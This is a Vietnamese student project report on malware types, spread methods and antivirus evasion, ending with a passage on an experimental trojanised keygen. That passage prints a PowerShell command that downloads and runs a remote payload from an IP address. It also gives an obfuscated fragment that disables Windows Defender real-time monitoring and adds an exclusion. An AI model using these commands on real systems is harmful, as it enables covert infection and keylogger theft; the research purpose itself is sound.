KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Giảng viên hướng dẫn: Ths. Trần Đắc Tốt.

Nhận thấy được sự tinh vi và mức độ nguy hiểm của mã độc nên mục đích của đồ án là nhằm nghiên cứu về các loại mã độc hiện nay cũng như cách thức mà chúng hoạt động trong hệ thống như th

TỔNG QUAN VỀ MÃ ĐỘC

Mã độc là gì

Mã độc (malware – malicious software) là một chương trình máy tính, phần mềm được tạo ra với mục đích phá hoại một máy tính hoặc cả một mạng máy tính, là một phần mềm độc hại Các chương trình máy tính này có thể làm được nhiều chức năng khác nhau tùy thuộc vào đặc tính của mỗi loại có thể kế tới như ăn cắp, mã hóa, chỉnh sửa dữ liệu, thay đổi chiếm đoạt quyền và giảm sát các hoạt động của máy tính nhiễm phải chúng mà chưa có sự cho phép của người sở hữu máy tính đó Ngày nay các loại mã độc trở nên rất phức tạp chúng phát triển theo thời gian từ cách thức lây nhiễm, cách thức ẩn mình trong hệ thống cho tới các cách thức chúng thực hiện để gây hại cho mục tiêu, Giới hạn về mặt chức năng cũng ngày càng được gia tăng lên khi mà một mã độc ngày nay có thể có nhiều chức của nhiều loại mã độc khác nhau, nâng cao hiệu quả tấn công và gây thiệt hại của những phần mềm độc hại này Với sự phát triển ngày một tăng của các loại mã độc từ đó thúc đẩy nâng cao sự phát triển vượt bậc của các công nghệ bảo mật nhằm chống lại mã độc, tạo ra các công nghệ mới đột phá hơn trong tương lai

Mã độc chỉ gây thiệt hại sau khi mà chúng đã vượt qua tất cả các giải pháp về bảo mật liên quan đến ngăn chặn, phát hiện mã độc và được cấy thành công trong máy tính của nạn nhân Sau đó chúng được thị như là một phần mềm riêng biệt trên máy nạn nhân mà nạn nhân không hề biết nó đang được thực thi trên máy của mình Vì vậy mã độc không bao gồm các đoạn mã gây nên các lỗi trên phần mềm thông thường – là các lỗi do vô ý hoặc thiếu sót của người lập trình viên gây ra, mặc dù những lỗi này cũng có thể bị các kẻ xấu lợi dụng để chiếm quyền, điều khiển,… máy của nạn nhân

BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC

Nhiều người sử dụng máy tính vẫn thường dùng thuật ngữ Virus để chỉ chung cho các loại mã độc Nhưng thực chất mã độc được chia thành nhiều dạng khác nhau, có thể kể đến như là Trojans, worms, spyware, botnet, ransomware,

Phân loại

Việc phân loại mã độc dựa trên các đặc tính khác nhau của từng loại cụ thể như là: khả năng nhân bản, cách thức nhiễm, khả năng ẩn mình, C&C,… Ngày càng khó xác định được loại phần mềm vì càng ngày các phần mềm độc hại thường được lai từ nhiều loại khác nhau gây khó khăn trong việc xác định loại của chúng Dù vậy chúng phẩn được phân loại theo các nhóm chính sau:

Virus máy tính là một loại mã độc phổ biến nhất Đối với những người không am hiểu về công nghệ họ thường dùng thuật ngữ virus để nói chung cho tất cả loại mã độc Thông thường virus được ẩn trong các chương trình máy tính trong như là vô hại, các file đặc biệt có đuôi exe, dll, Nó có khả năng tạo ra bản sao và lây lan sang các máy tính khác thông qua nhiều con đường khác nhau, điển hình nhất là thông qua các thiết bị lưu trữ dùng để chia sẻ dữ liệu với các máy tính khác như là USB, thẻ nhớ flash, Ngoài ra nó có thể lây nhiễm sang máy khác khác qua email, các giao thức mạng chia sẻ dữ liệu.

Dựa vào các đặc tính của virus liên quan đến mục đích lây nhiễm và phương pháp mà virus sử dụng để ẩn thân không bị phát hiện ta có thể phân virus rà thành các loại sau:

 Boot virus: là loại virus lây vào boot sector hoặc master boot record của ổ đĩa cứng, Đây là các khu vực đặc biệt chứa các dữ liệu để khởi động hệ thống, nạp các phân vùng Hệ thống sẽ bị lây nhiễm virus khi khởi động Tuy nhiên loại virus này rất khó cho việc tạo ra, vì kích thước của con virus này sẽ phụ thuộc vào kích thước của một sector, thông thường sẽ là 512 byte và phải sử dụng các loại ngôn ngữ máy để viết Khả năng lây lan chậm và không còn phù hợp với sự phát triển mạnh mẽ của mạng Internet ngày nay Cho nên rất khó để có thể thấy sự xuất hiện của loại virus này

 Macro virus: o Là một loại virus được viết bằng ngôn ngữ macro, được nhúng vào phần mềm ứng dụng, các loại file phần mềm Microsoft

Excel, Microsoft Word, cho phép nhúng các đoạn macro - là các đoạn mã độc hại vào tài liệu, các file tài liệu có phần mở rộng có thể là: doc, xls, ppt, tạo nên các đoạn kịch bản và thực thi khi mở các file tài liệu này Đó có thể là một chuỗi các hành động được thực hiện nhằm gây hại cho máy tính hoặc là con đường trung gian để đưa các loại mã độc khác vào máy bị nhiễm một cách an toàn o Vì được nhúng vào các file tài liệu nên nó có thể thực thi mà không quan tâm tới hệ điều hành, cho nên hầu hết tất cả các loại hệ điều hành đều có thể dính loại virus này

 File virus (virus tập tin): Là một loại virus ẩn và sống ký sinh bên trong các file thực thi (các file có phần mở rộng exe, dll,…) là một đoạn mã để ghi người dùng thực thi file, đoạn mã virus sẽ được kích hoạt chung Sau đó tiến hành các hành vi phá hoại, lây nhiễm,… Là một loại virus nguy hiểm do tốc độ lây lan nhanh chóng và khó tiêu diệt cũng như phát hiện ra so với các loại virus khác Loại virus này thì phải phụ thuộc vào các hệ điều hành vì mỗi loại hệ điều hành các tập tin thực thi khác nhau

 Scripting virus (virus kịch bản): Giống với virus macro Sự khác biệt cơ bản là virus macro được viết bằng ngôn ngữ được hiểu bởi một

Trang 4 trong khi scripting virus được viết bằng ngôn ngữ mà hệ điều hành được cài đặt sẵn và đi liên với hệ điều hành đó không thể gỡ ra được, được thực thi bởi hệ điều hành đó Do đó loại virus này phải phụ thuộc vào hệ điều hành, với mỗi loại hệ điều hành các đoạn mã độc khác nhau

Worm (sâu máy tính) giống với virus thì nó cũng là một đoạn mã độc sống ký sinh trong các chương trình máy tính, nhằm phá hoại và lây lan Nó có khả năng tự nhân bản trên chính bản thân nó mà không cần sao chép và nhúng vào một file nào khác Thông thường chúng sử dụng mạng máy tính để lây lan, kể cả mạng Internet Lợi dung các lỗi bảo mật trên các hệ thống để tiếp tục lây lan với tốc độ cao

Tốc độ lây lan của worm nhanh hơn rất nhiều so với virus do chúng sử dụng các máy nhiễm như là một máy chủ phát tán tiếp tục các bản sao của chúng tới các máy tính khác trong hệ thống mạng Cơ chế nhân bản của worm sử dụng đệ quy để nhân bản nên tốc độ nhân bản chính bản thân chúng Do đó sự lây lan và tăng trưởng của chúng trong một hệ thống máy tính là cấp số nhân Vì vậy khi phát hiện ra worm thì nên nhanh chóng cách lý các máy đã bị nhiễm hoặc có khả năng bị nhiễm khỏi các máy chưa các dấu hiệu bị nhiễm trong mạng

Trojan horse hay còn được gọi tắt là Trojan nó là một loại mã độc, không giống với virus hay worm thì nó không có khả năng tự nhân bản và lây lan mà phải thông qua các loại mã độc khác hoặc phần mềm trung gian để phát tán Các đoạn mã Trojan được dấu trong các phần mềm máy tính thông thường để bí mật xâm nhập vào máy nạn nhân Và vào một lúc nào đó chúng sẽ tiến hành các hành động ăn cắp thông tin trong máy tính nạn nhân mà nạn nhân không hề hay biết

Là loại mã độc sẽ mã hóa các tập tin hoặc ngăn cản quyền truy cập và sử dụng dữ liệu bên trong máy chủ (máy tính nói chung) Kẻ tấn công sẽ yêu cầu một khoản tiền chuộc từ nạn nhân để khôi phục quyền truy cập dữ liệu (không phải lúc nào người dùng cũng lấy lại được dữ liệu khi thanh toán theo yêu cầu của kẻ tấn công)

Back door gọi đầy đủ là crypto backdoor Đây là một loại Trojan cho phép kẻ tấn công có quyền truy cập và thực hiện các lệnh trên hệ thống bị xâm nhập Trong một hệ thống máy tính, backdoor tức là một phương pháp vượt qua thủ tục chứng thực người dùng thông thường hoặc để giữ đường truy nhập từ xa tới một máy tính, cố gắng không bị phát hiện bởi việc giám sát thông thường

Mã độc này cung cấp cho kẻ tấn công quyền truy cập đặc quyền vào hệ thống bị nhiễm và che giấu sự hiện diện của nó hoặc sự hiện diện của phần mềm khác Rootkit thường được hacker dùng sau khi chiếm được quyền truy cập vào hệ thống máy tính Nó sẽ che dấu dữ liệu hệ thống, tập tin hoặc tiến trình đang chạy, từ đó hacker có thể vào hệ thống máy tính mà không thể biết được Với Rootkit thì hầu như mọi loại mã độc khác đều có thể vượt mặt AV dễ dàng

Là một loại mã độ sẽ đưa ra các quảng cáo hiển thị lên màn hình của nạn nhân và gây ra sự khó chịu đối với người dùng Nó giống một dạng spam quảng cáo trên máy tính của nạn nhân Thông thường ngụy trang dưới dạng một chương trình hợp pháp hoặc ẩn mình trong một chương trình khác để lừa người dùng cài đặt nó

1.2.8 Botnet Đây là một nhóm hoặc một hệ thống máy tính bị nhiễm cùng một loại mã độc (được gọi là bot), đang chờ nhận lệnh từ máy chủ điều khiển và chỉ huy do kẻ tấn công điều khiển Sau đó, kẻ tấn công có thể ra lệnh cho các bot này, chúng có thể thực hiện các hoạt động độc hại như tấn công DDOS hoặc gửi email spam

Mục đích và tầm nguy hiểm của mã độc

Mục đích chung của mã độc là các hành vi trộm cắp thông tin cá nhân hoặc tạo ra cửa sau trong hệ thống để có thể truy cập vào tài nguyên dữ liệu mà không cần có sự cho phép của chủ sở hữu Theo một vài thống kê cho thấy, hầu hết các cuộc tấn công bằng hình thức mã độc chủ yếu nhằm vào chính phủ hoặc các tổ chức tài chính Tiếp theo đó là các công ty, dịch vụ… Điều này lý giải cho mục tiêu của mã độc là nhằm vào lợi nhuận và lây lan rộng

Hình 3 Mục đích của tấn công mã độc

Mã độc được coi là mối đe dọa phổ biến của hầu hết các máy chủ của các cá nhân , tổ chức Nó gây ra sự phá hủy và gián đoạn rộng rãi và đòi hỏi nỗ lực phục hồi tốn kém trong hầu hết các tổ chức Tất cả người dùng máy tính

PC, Laptop, các thiết bị di động, các thiết bị IoT có kết nối Internet đề có nguy cơ trở thành nạn nhân của các cuộc tấn công mã độc Với người dùng sử dụng máy tính hay các thiết bị di động nói chung mã độc có thể chiếm quyền điều khiển máy tính, lấy cắp dữ liệu nhạy cảm, không những ảnh hưởng đến băng thông mà còn làm gián đoạn, tổn hại tới tính bị bí mật, toàn vẹn và sẵn sàng của dữ liệu Đối với những thiết bị IoT khi đã bị nhiễm mã độc, người dùng có thể bị theo dõi các hoạt động sinh hoạt hằng ngày, các công việc đời tư cá nhân.

Quy ước đặt tên cho mã độc

Hiện nay có rất nhiều các biến thể mã độc khác nhau được các hãng phần mềm Antivirus thu thập được Điều này dẫn đến việc thống nhất tên các loại mã độc theo một quy tắc đặt tên cụ thể Theo tổ chức nghiên cứu virus máy tính Computer Antivirus Research Organization (CARO) đã đưa ra một định dạng chung cho tất cả các loại mã độc như sau:

Hình 4 Quy ước đặt tên cho mã độc

Trong đó : o Type: chỉ ra loại của mã độc thực thi trên máy tính của bạn

Worms, viruses, trojans, backdoors, và ransomware là một số loại mã độc phổ biến hiện nay o Platform: các nền tảng chỉ ra môi trường thực thi của mã độc

(chẳng hạn như Windows, masOS X và Android) mà phần mềm độc hại được thiết kế để hoạt động Nền tảng này cũng chỉ ra được ngôn ngữ lập trình mã độc hay định dạng của nó o Framily: Nhóm phần mềm độc hại dựa trên các đặc điểm chung, bao gồm ghi nhận tác giả cho cùng một tác giả Các nhà cung cấp phần mềm bảo mật đôi khi sử dụng các tên khác nhau cho cùng một họ phần mềm độc hại o Variant: đại diện cho các biến thể trong một loại mã độc Được sử dụng tuần tự cho mọi phiên bản riêng biệt của họ phần mềm độc hại Ví dụ: phát hiện biến thể “.AF” sẽ được tạo sau khi phát hiện biến thể “.AE” o Suffixes: Cung cấp thêm chi tiết về phần mềm độc hại, bao gồm cách nó được sử dụng như một phần của mối đe dọa đa thành phần Trong ví dụ trên, "! Lnk" chỉ ra rằng thành phần mối đe dọa là một tệp lối tắt được sử dụng bởi Trojan: Win32/Reveton.T

CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC

Cơ chế hoạt động của mã độc

Nghiên cứu mã độc trên máy tính luôn gắn với việc phân tích các định dạng dữ liệu và vật chủ Mỗi loại mã độc chỉ lây vào một số định dạng dữ liệu nhất định Phân tích các định dạng dữ liệu mà mã độc hay sử dụng làm môi trường lây lan, cư trú để phát tán và thực thi trên môi trường của nạn nhân thì chúng tôi nhận thấy các định dạng vật chủ chứa mã thực thi có thể nhiễm mã độc bao gồm: các tệp tin văn bản, tệp tin chương trình…

STT Vật chủ Loại virus Định dạng Kiểu

Tệp tin registry reg Tệp tin siêu văn bản htt, hta

Tệp tin thực thi exe, scr

Tệp tin thư viện dll, cpl, sys

Tệp tin tư liệu doc, docx, dot

Tệp tin bảng tính xls, xlsx, xlt

Tệp trình trình diễn ppt, pptx, pot

4 Mẫu tin khởi động Boot virus

Mẫu tin khởi động hệ điều hành đĩa mềm #N/A

Mẫu tin khởi động hệ điều hành đĩa cứng #N/A

Mẫu tin khởi tạo phân vùng đĩa cứng #N/A

Các phương phát lây lan của mã độc

Hiện nay có rất nhiều hình thức phát tán mã độc hại, có thể thông qua các tệp đính kèm trong mail, thông qua các phần mềm gắn mã độc vào bên trong, thông qua việc chia sẻ USB hay thông qua các lỗ hổng hệ điều hành, ứng dụng…

2.2.1 Phát tán thông qua tệp đính kèm trong email

Cách phát tán mã độc hại lớn nhất qua email hiện nay là các hacker đính kèm tài liệu độc hại vào các email bao gồm các loại virus lừa đảo, spyware, worm… dưới các dạng file không rõ nguồn gốc, đặc biệt là các file có đuôi là exe, com, pdf, bat, zip…

Hình 5 Đính kèm mã độc trong email

Dưới đây là kịch bản sử dụng tài liệu độc hại để phát tán và lây nhiễm gây hại cho người dùng

Hình 6 Quy trình lây nhiễm mã độc qua email

Tin tạc sử dụng email để gửi cho người dùng nội dung kèm theo một file đính kèm là file excel Khi người dùng kiểm tra email và thấy có một file

Mã độc ở đây là một chương trình keylogger Chương trình này sẽ ghi lại toàn bộ thông tin hoạt động của nạn nhân Sau đó gửi thông tin nhạy cảm này về cho máy chủ của tin tặc

2.2.2 Phát tán dựa trên link độc hại

Hình thức phát tán mã độc dựa trên link độc hại cũng là một hình thức tấn công khá phổ biến Phương thức này có thể được mô tả cụ thể như sau:

Hình 7 Phát tán mã độc bằng link độc hại thông qua sms brandname

Thông tin từ NCSC tính tới năm 2020 thì đã có 24.820 website tại Việt Nam bị báo cáo không an toàn Trong đó, có tới 12.052 trang web bị cảnh báo có yếu tố nguy hiểm, lừa đảo hoặc giả mạo Khi người dùng thông thường truy cập vào một trang web giả mạo với giao diện giống hoàn toàn với các thương hiệu, doanh nghiệp nổi tiếng như là các trang web của ngân hàng, chính phủ,… các trang web này khổng chỉ dùng mục đích lừa đảo, chiếm đoạt tài sản mà còn có các đoạn mã độc được chèn vô là các đoạn mã độc được viết bằng ngôn ngữ kịch bản javascript các đoạn mã này đã bị làm mà hoặc mã hóa làm người dùng không nhận ra sự nguy hiểm của chúng Sau đó người dùng sẽ tự động điều hướng tới một đường link khác để tải các đoạn mã độc chính vào máy tính và thực thi Từ đây thì các đoạn mã độc này sẽ làm những việc phá hoại tùy thuộc vào khá năng của chúng

Khi người dùng thông thường truy cập vào một website có chứa các đoạn mã độc, là các đoạn mã độc được viết bằng ngôn ngữ kịch bản javascript các đoạn mã này đã bị làm mà hoặc mã hóa làm người dùng không nhận ra sự nguy hiểm của chúng Sau đó người dùng sẽ tự động điều hướng tới một đường link khác để tải các đoạn mã độc chính vào máy tính và thực thi Từ đây thì các đoạn mã độc này sẽ làm những việc phá hoại tùy thuộc vào khá năng của chúng

2.2.3 Phát tán thông qua thiết bị USB Đây là một hình thức phát tán mã độc rất phổ biến Trước đây, virus AutoRun từng hoành hành với cơ chế mở ổ điwxa là kích hoạt mã độc Điều này khiến tốc độ lây lan của dòng virus này trở nên không thể kiểm soát Microsoft đã buộc phải quyết định cắt bỏ tính năng AutoRun đối với USB từ windows 7 và trên cả Windows XP

Hình 8 Phát tán mã độc thông qua các thiết bị USB

Hiện tại tin tặc đã nghĩ ra một phương án mới để thực hiện lây nhiễm mã độc, người dùng khi mở USB bị nhiễm mã độc sẽ thấy một ổ đĩa nữa trong USB và phải mở tiếp ổ đĩa thứ hai này mới có thể thấy được các dữ liệu Thực chất ổ đĩa thứ hai này chính là một shortcut chứa mã độc Khi người dùng mở dữ liệu cũng là lúc máy tính bị nhiễm mã độc từ USB Mặc dù cơ chế AutoRun đã bị loại bỏ, nhưng với sự xuất hiện của W32.UsbFakeDriver, virus trên USB có thể lây lan và phát tán nhanh chống chỉ với thao tác truy cập vào ổ đĩa USB của người dùng

MỘT SỐ KỸ THUẬT VƯỢT MẶT ANTIVIRUS

Phần mềm Antivirus hoạt động như thế nào?

Để chống lại virus nói chung là một công việc vô cùng khó khăn; bởi vì nó cần phải tìm và xác định được đâu là tệp độc hại trong một khoảng thời gian cực ngắn để không làm gián đoạn đến trải nghiệm của người dùng Điều quan trọng là phải hiểu rõ các kỹ thuật mà Hacker dùng để bypass lại hệ thống Antivirus để thiết kế bảo mật toàn diện bảo vệ được hệ thống của cá nhân tổ chức.

Hình 9 Một số phần mềm Antivirus thông dụng hiện nay

Hai phương pháp phổ biến mà các hệ thống, phần mềm Antivirus sử dụng để tìm kiếm và xác định các tệp độc hại là quét theo phương pháp

Heuristic và dựa trên bộ Signature Quét dựa trên bộ signature sẽ kiểm tra về hình thức, cấu trúc, format của tệp, tìm kiếm các string và function khớp với một phần nào đó của các phần mềm độc hại đã biết trước Tính năng quét dựa trên heuristic sẽ xem xét chức năng của tệp bằng việc sử dụng các thuật toán và mẫu để cố gắng xác định xem phần mềm có đang làm điều gì đáng ngờ ảnh hưởng hay không

Từ lâu, các phần mềm Antivirus nói chung được coi là một giải pháp tuyệt vời để đảm bảo an toàn cho hệ thống Tuy nhiên, theo nhiều chuyên gia trong lĩnh vực công nghệ thông tin và các chuyên gia về an ninh mạng tin rằng mặc dù nó là một sản phẩm tốt để đảm bảo an toàn cho hệ thống nhưng điều này không đồng nghĩa với việc luôn đảm bảo cho hệ thống của bạn không bị tấn công bypass Antivirus – bởi vì các chương trình Antivirus đơn giản chỉ dựa vào cơ sở dữ liệu về các ký hiệu nhận biết như đã nói ở trên

Tin tặc đã vượt mặc Antivirus như thế nào?

Tội phạm mạng đã nghĩ ra một số kỹ thuật để chống lại phần mềm Antivirus và đảm bảo rằng phần mềm độc hại của chúng tránh được phần mềm Antivirus đang chạy trong hệ thống hoặc máy tính của nạn nhân Một trong các kỹ thuật này liên quan đến việc packing (đóng gói mã nguồn) và Encryption, điều này có nghĩa là chúng thiết kế các tiện ích đặc biệt để packing và encryption theo cách mà phần mềm Antivirus không thể phát hiện Thứ hai, tội phạm mạng cũng có thể thực hiện đột biến mã bằng cách trộn mã virus trojan và ‘thư rác’ để thay đổi giao diện mã của phần mềm

Ngoài ra tội phạm mạng cũng có thể vượt mặt phần mềm Antivirus bằng cách chặn các phần mềm Antivirus và cập nhật cơ sở dữ liệu Virus trojan và sâu mạng sẽ tìm kiếm các chương trình Antivirus đang hoạt động trên hệ thống của nạn nhân Sau đó, phần mềm độc hại này sẽ chặn phần mềm Antivirus, làm hỏng cơ sở dữ liệu của chương trình hoặc ngăn chặn Antivirus hoạt động

Hình thức tấn công phishing vẫn đang được tin tặc thường xuyên sử dụng Tin tặc có thể tạo ra email có vẻ hợp pháp cho hoạt động kinh doanh của bạn và khi người dùng nhấp vào các tệp đính kèm nó sẽ tự động tải xuống các chương trình độc hại được nhúng trực tiếp vào các tệp có vẻ rất an toàn như Adobe PDF hay các sản phẩm của Microsoft Office

Kỹ thuật Obfuscation

Obfuscation là một kỹ thuật làm cho các chương trình khó hiểu hơn Với mục đích là nó sẽ chuyển một chương trình sang một phiên bản mới khác trong khi làm cho chúng không thay đổi gì về mặt chức năng Ban đầu, công nghệ này nhằm mục đích bảo vệ tài sản trí tuệ của các nhà phát triển phần mềm, nhưng nó đã được các người viết ra các phần mềm độc hại sử dụng rộng rãi để tránh bị phát hiện Có nghĩa là, để trốn tránh các AV, phần mềm độc hại được phát triển thành các thế hệ mới thông qua kỹ thuật obfuscation

Obfuscation đơn giản chỉ là việc làm biến dạng phần mềm độc hại trong khi vẫn dữ nguyên dạng của nó Một ví dụ đơn giản sẽ là ngẫu nhiên hóa các trường hợp của các ký tự trong tập lệnh PowerShell Chức năng giống nhau PowerShell không quan tâm đến trường hợp của các ký tự, nhưng nó có thể đánh lừa quá trình quét dựa trên chữ ký đơn giản

Với mã máy tính, người đọc có thể là một người, một thiết bị tính toán hoặc một chương trình khác Obfuscation cũng được sử dụng để đánh lừa các công cụ Antivirus và các chương trình khác dựa nhiều vào chữ ký số để diễn giải mã Trình biên dịch có sẵn cho các ngôn ngữ như Java, hệ điều hành như Android và iOS, và các nền tảng phát triển như NET Họ có thể tự động đảo ngược mã nguồn; obfuscation nhằm mục đích gây khó khăn cho các chương trình này trong việc dịch ngược của chúng

Obfuscation không phải là thay đổi nội dung của mã gốc của chương trình, mà là làm cho phương thức phân phối và cách trình bày của mã đó trở nên khó hiểu hơn Obfuscation không thay đổi cách chương trình hoạt động hoặc kết quả đầu ra của nó

Sau đây là đoạn mã ví dụ về mã JavaScript bình thường: var greeting = 'Hello World'; greeting = 10; var product = greeting * greeting; Đoạn mã tương tự ở dạng xáo trộn trông như thế này: var

_0x154f=['98303fgKsLC','9koptJz','1LFqeWV','13XCjYtB','6990QlzuJn','8 7260lXoUxl','2HvrLBZ','15619aDPIAh','1kfyliT','80232AOCrXj','2jZAgw Y','182593oBiMFy','1lNvUId','131791JfrpUY'];var

_0x5e377c=_0x52df;while(!![]){try{var _0x2d3a87=- parseInt(_0x5e377c(0x129))*parseInt(_0x5e377c(0x123))+- parseInt(_0x5e377c(0x125))*parseInt(_0x5e377c(0x12e))+parseInt(_0x5e3 77c(0x127))*-parseInt(_0x5e377c(0x126))+-parseInt(_0x5e377c(0x124))*- parseInt(_0x5e377c(0x12f))+-parseInt(_0x5e377c(0x128))*- parseInt(_0x5e377c(0x12b))+parseInt(_0x5e377c(0x12a))*parseInt(_0x5e3 77c(0x12d))+parseInt(_0x5e377c(0x12c))*parseInt(_0x5e377c(0x122));if(_ 0x2d3a87===_0x2b7215)break;else

_0x19e682['push'](_0x19e682['shift']());}catch(_0x22c179){_0x19e682['pu sh'](_0x19e682['shift']());}}}(_0x154f,0x1918c));var greeting='Hello\x20World';greeting=0xa;var product=greeting*greeting;

Dưới đây là một số kỹ thuật Obfuscation phổ biến

 Renaming: Trình obfuscator thay đổi các phương thức và tên của các biến Các tên mới có thể bao gồm các ký tự không in được hoặc không nhìn thấy

 Packing: iều này sẽ nén toàn bộ chương trình để làm cho mã không thể đọc được

 Control flow: Kiểm soát dòng chảy Mã dịch ngược được tạo ra để trông giống như logic spaghetti, không có cấu trúc và khó duy trì mã khi dòng suy nghĩ bị che khuất Kết quả từ mã này không rõ ràng và thật khó để biết điểm của mã là gì bằng cách nhìn vào nó

 Instruction pattern transformation: Cách tiếp cận này lấy các hướng dẫn phổ biến do trình biên dịch tạo ra và hoán đổi chúng để lấy các hướng dẫn phức tạp hơn, ít phổ biến hơn để thực hiện hiệu quả điều tương tự

 Dummy code insertion: Mã giả có thể được thêm vào chương trình để làm cho nó khó đọc hơn và thiết kế ngược, nhưng nó không ảnh hưởng đến logic hoặc kết quả của chương trình

 Metadata or unused code removal: siêu dữ liệu hoặc loại bỏ mã không sử dụng Mã và siêu dữ liệu không sử dụng cung cấp cho người đọc thêm thông tin về chương trình, giống như chú thích trên tài liệu Word, có thể giúp họ đọc và gỡ lỗi chương trình Việc xóa siêu dữ liệu và mã không sử dụng khiến người đọc có ít thông tin hơn về chương trình và mã của nó

 Opaque predicate insertion: Chèn vị ngữ đục Vị từ trong mã là một biểu thức logic đúng hoặc sai Các vị từ đục là các nhánh có điều kiện - hoặc các câu lệnh if-then - trong đó kết quả không thể dễ dàng xác định được bằng phân tích thống kê Việc chèn một vị từ không rõ ràng sẽ giới thiệu mã không cần thiết không bao giờ được thực thi nhưng gây khó hiểu cho người đọc đang cố gắng hiểu đầu ra được dịch ngược

 Anti-debug: Chống gỡ lỗi Các kỹ sư phần mềm và tin tặc hợp pháp sử dụng các công cụ gỡ lỗi để kiểm tra từng dòng mã Với những công cụ này, các kỹ sư phần mềm có thể phát hiện ra các vấn đề với mã

Trang 16 nào một tin tặc đang chạy chương trình gỡ lỗi như một phần của cuộc tấn công Tin tặc có thể chạy các công cụ chống gỡ lỗi để xác định khi nào một công cụ gỡ lỗi đang được sử dụng để xác định những thay đổi mà chúng đang thực hiện đối với mã

 Anti-tamper: Chống làm giả Các công cụ này phát hiện mã đã bị giả mạo và nếu nó đã được sửa đổi, nó sẽ dừng chương trình

 String encryption: Mã hóa chuỗi Phương pháp này sử dụng mã hóa để ẩn các chuỗi trong tệp thực thi và chỉ khôi phục các giá trị khi chúng cần thiết để chạy chương trình Điều này gây khó khăn cho việc duyệt qua một chương trình và tìm kiếm các chuỗi cụ thể

 Code transposition: Đây là sự sắp xếp lại các quy trình và các nhánh trong mã mà không có ảnh hưởng rõ ràng đến hành vi của nó.

Kỹ thuật Encryption

Phương pháp thứ 2 là Encryption Encryption là phương pháp loại bỏ hiệu quả khả năng chống lại phần mềm Antivirus phát hiện ra phần mềm độc hại thông qua Signature Thông thường kẻ tấn công hay tác giả của các phần mềm độc hại sẽ sử dụng các Crypter (chương trình mã hóa) để mã hóa các tải trọng độc hại của họ Các Crypter mã hóa một tệp tin và đính kèm một ‘Stub’, và sẽ có một chương trình Decrypter giải mã nội dung sau đó thực thi chúng

Một trong những cách tiếp cận và vượt qua các AV dựa trên chữ ký là sử dụng Encryption.Theo cách tiếp cận này, phần mềm độc hại được mã hóa thường bao gồm bộ giải mã và phần trọng tải được mã hóa Bộ giải mã khôi phục phần trọng tải bị mã hóa bất cứ khi nào file bị nhiễm được thực thi Đối với mỗi lần lây nhiễm, bằng cách sử dụng một khóa khác nhau, phần mềm độc hại làm cho phần được mã hóa trở thành duy nhất, do đó ẩn chữ ký của nó Tuy nhiên, vấn đề chính của phương pháp này là bộ giải mã không đổi từ thế hệ này sang thế hệ khác Điều đó giúp AV có thể phát hiện loại phần mềm độc hại này dựa trên mẫu bộ giải mã có sẵn int main( void )

{ decryptCodeSection(); // Decrypt the code startShellCode(); // Call the shellcode in decrypted code return 0;

Có 2 loại chương trình Crypter:

 Scantime: là những chương trình đơn giản nhất và đơn giản là giải mã payload, sau đó đưa nó xuống ổ đĩa để thực thi

 Runtime: cũng là nhưng chương trình nhưng nó sẽ dùng những kỹ thuật để injection những process khác nhau để giải mã đoạn payload độc hại và thực thi nó ngay trên memory – RAM mà không cần đụng chạm đến đĩa cứng

Một trong những phương pháp Injection process phổ biến nhất được sử dụng bởi các chương trình thời gian chạy là “Process Hollowing” Đầu tiên tạo một tiến trình mới ở trạng thái bị treo bằng cách sử dụng tệp thực thi hoàn toàn hợp pháp như explorer.exe Sau đó, nó “làm rỗng” process này bằng cách giải phóng bộ nhớ process hợp pháp và thay thế nó bằng payload độc hại trước khi tiếp tục tiến trình.

TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC

Triển khai kỹ thuật vượt mặc Antivirus

Ý tưởng ban đầu để đánh lừa người dùng thực thi đoạn mã độc là chúng ta sẽ ẩn mình nó trong một chương trình, tạm gọi đây là chương trình keygen Giao diện chính của chương trình sẽ có dạng như sau:

Hình 10 Giao diện chính của phần mềm chứa mã độc

Chức năng chính của phần mềm trên là lấy quyền Adminstrator từ người dùng, sau đó thực thi mã độc đã được đính kèm theo trong chương trình Trước khi thực hiện kỹ thuật bypass Antivirus, nhóm sẽ kiểm tra xem phần mềm trên có bị phần mềm Antivirus nào phát hiện hay không? Để kiểm tra thì nhóm sử dụng trang web https://www.virustotal.com/gui/ - đây là một công cụ kiểm tra online miễn phí, được sự tham gia của nhiều phần mềm Antivirus khác nhau

Hình 11 Kết quả Virus Total kiểm tra trước khi có mã độc được đính kèm

Mặc dù phần mềm trên vẫn chưa được đính kèm mã độc nhưng Virustotal cho kết quả 15/68 phần mềm Antivirus phát hiện là chương trình độc hại Có thể Antivirus phát hiện nhầm không? Không – phần mềm vẫn chưa được đính kèm mã độc nên các phần mềm Antivirus hoạt động theo cơ chế Heuristic sẽ không phát hiện ra là phần mềm độc hại Nhưng còn cơ chế Signature, nó sẽ tìm kiếm các thông tin chuỗi dữ liệu trong chương trình, cũng như các thông tin liên quan đến metadata

Hình 12 Thông tin metadata của phần mềm chứa mã độc

Dựa vào thông tin metadata như trên ta có thể dễ dàng nhận định đây có thể mà một phần mềm độc hại Các phần mềm Antivirus hoạt động theo cơ chế Signature cũng như thế Để xác định lại có phải do các thông tin này mà các phần mềm Antivirus trên trang Virustotal đã đưa ra kết quả như vậy không, nhóm sẽ thay đổi thông tin metadata này và kiểm tra lại một lần nữa trên trang Virustotal

Hình 13 Thông tin metadata của phần mềm độc hại sau khi được chỉnh sửa

Nhằm làm khó cho người phân tích mã độc khi họ dịch ngược phần mềm độc hại của mình tìm ra được những thay đổi trên hệ thống, nhóm quyết định không lưu mã độc chính tại chương trình Thay vào đó, mã độc được đính kèm trong phần mềm sẽ có nhiệm vụ tải phần mềm độc hại Keylogger.exe được lưu trên server, và đoạn mã độc chính cũng sẽ được tải về và thực thi ngay trên memory iex((New-Object

System.Net.WebClient).DownloaString(\"http://103.69.193.23/Document.doc"))

Hình 15 Mã độc đính kèm trong phần mềm

DisableRealtimeMonitoring ${T`RuE}&("{1}{0}{2}{3}"-f't- Mp','Se','Prefer','ence')-ExclusionPath

